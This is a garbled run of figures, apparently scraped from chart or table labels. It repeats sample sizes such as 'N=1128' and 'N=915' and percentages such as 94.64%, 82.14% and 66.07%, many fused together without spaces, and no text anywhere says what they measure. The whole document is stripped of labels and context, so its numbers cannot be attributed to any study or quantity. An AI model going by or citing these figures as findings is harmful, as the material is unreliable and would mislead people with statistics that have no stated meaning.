N=411 N=552 N=312 N=915N=1128N=1128N=1128N=1128N=1128N=1128N=1128N=1128N=1128N=1128N=1128N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=481 N=487 N=411 N=552 N=312N=1128 N=481 N=487 N=411 N=552 N=312N=1128 N=481 N=487 N=411 N=552 N=312N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128N=1128N=1128N=1128N=1128N=1128N=1128N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128N=1128N=1128N=1128 N=915N=1128 N=915N=1128N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=481N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128N=1128N=1128N=1128N=1128N=1128N=1128N=1128N=1128 N=487 N=411 N=552 N=915N=1128 N=487 N=411 N=552 N=915N=1128 N=487 N=411 N=552 N=915N=1128 N=487 N=411 N=552 N=915N=1128 N=487 N=411 N=552 N=915N=1128N=1128N=1128N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=915N=1128 N=411 N=552 N=915N=1128 N=411 N=552 N=915N=1128 N=411 N=552 N=915N=1128 N=411 N=552 N=915N=1128 N=411 N=552 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128 N=481 N=487 N=411 N=552 N=312 N=915N=1128N=1128N=1128N=1128N=1128N=1128N=1128N=1128N=1128 N=481 N=487 N=411 N=552 N=915N=481 N=487 N=411 N=552 N=915N=481 N=487 N=411 N=552 N=915N=481 N=487 N=411 N=552 N=915N=481 N=487 N=411 N=552 N=915 94.64% 66.07% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 66.07% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 64.29% 82.14%94.64% 64.29% 82.14%94.64% 64.29% 82.14%94.64% 64.29% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%66.07% 82.14%66.07% 82.14%66.07% 82.14%66.07% 82.14%66.07% 82.14%66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07%94.64% 66.07% 62.5% 64.29% 66.07%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%66.07% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%82.14%82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64%94.64%94.64%94.64%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64%94.64%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 64.29% 82.14%94.64% 64.29% 82.14%94.64% 64.29% 82.14%94.64% 64.29% 82.14%94.64% 64.29% 82.14%94.64% 64.29% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 64.29% 66.07% 82.14%66.07% 82.14%66.07% 82.14%66.07% 82.14%66.07% 82.14%66.07% 82.14%66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 62.5%94.64% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 62.5% 66.07% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64% 66.07% 62.5% 66.07% 82.14%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64%94.64%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 62.5% 82.14%94.64% 66.07% 62.5% 66.07%94.64% 66.07% 62.5% 66.07%94.64% 66.07% 62.5% 66.07%94.64% 66.07% 62.5% 66.07%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64% 82.14%94.64%94.64%94.64%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 66.07% 62.5% 64.29% 66.07% 82.14%94.64% 